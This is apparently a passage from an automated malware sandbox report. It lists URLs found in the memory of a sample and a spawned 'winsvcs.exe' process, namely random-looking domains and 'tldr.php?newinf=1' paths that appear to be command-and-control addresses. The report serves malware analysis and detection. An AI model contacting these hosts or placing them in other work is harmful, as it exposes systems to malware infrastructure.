Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://eoroooskfogihisrg.in/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://eoroooskfogihisrg.in/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://eoroooskfogihisrg.in/tldr.php?newinf=15i%
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://eoroooskfogihisrg.info/
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://eoroooskfogihisrg.net/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://eoroooskfogihisrg.net/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://eoroooskfogihisrg.net/tldr.php?newinf=1YA
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://eoroooskfogihisrg.ru/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://eoroooskfogihisrg.ru/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://eoroooskfogihisrg.su/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://eoroooskfogihisrg.su/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://fifiehsueuufidhfi.biz/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fifiehsueuufidhfi.biz/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fifiehsueuufidhfi.biz/tldr.php?newinf=1.m
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fifiehsueuufidhfi.biz/tldr.php?newinf=11m
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fifiehsueuufidhfi.biz/tldr.php?newinf=18m
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fifiehsueuufidhfi.biz/tldr.php?newinf=1Yk
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fifiehsueuufidhfi.biz/tldr.php?newinf=1sn
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://fifiehsueuufidhfi.com/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fifiehsueuufidhfi.com/tldr.php?ne
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fifiehsueuufidhfi.com/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fifiehsueuufidhfi.com/tldr.php?newinf=1k
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://fifiehsueuufidhfi.in/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fifiehsueuufidhfi.in/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://fifiehsueuufidhfi.info/
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://fifiehsueuufidhfi.net/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fifiehsueuufidhfi.net/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fifiehsueuufidhfi.net/tldr.php?newinf=1P
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://fifiehsueuufidhfi.ru/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fifiehsueuufidhfi.ru/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://fifiehsueuufidhfi.su/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fifiehsueuufidhfi.su/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fifiehsueuufidhfi.su/tldr.php?newinf=1xh
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://fiiauediehduefuge.biz/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fiiauediehduefuge.biz/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fiiauediehduefuge.biz/tldr.php?newinf=1&
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fiiauediehduefuge.biz/tldr.php?newinf=13
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://fiiauediehduefuge.com/
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fiiauediehduefuge.com/tldr.php?newinf=1
Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fiiauediehduefuge.com/tldr.php?newinf=1Ck%
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fiiauediehduefuge.com/u
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://fiiauediehduefuge.in/
Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fiiauediehduefuge.in/tldr.php?newinf=1
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://fiiauediehduefuge.info/
Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, 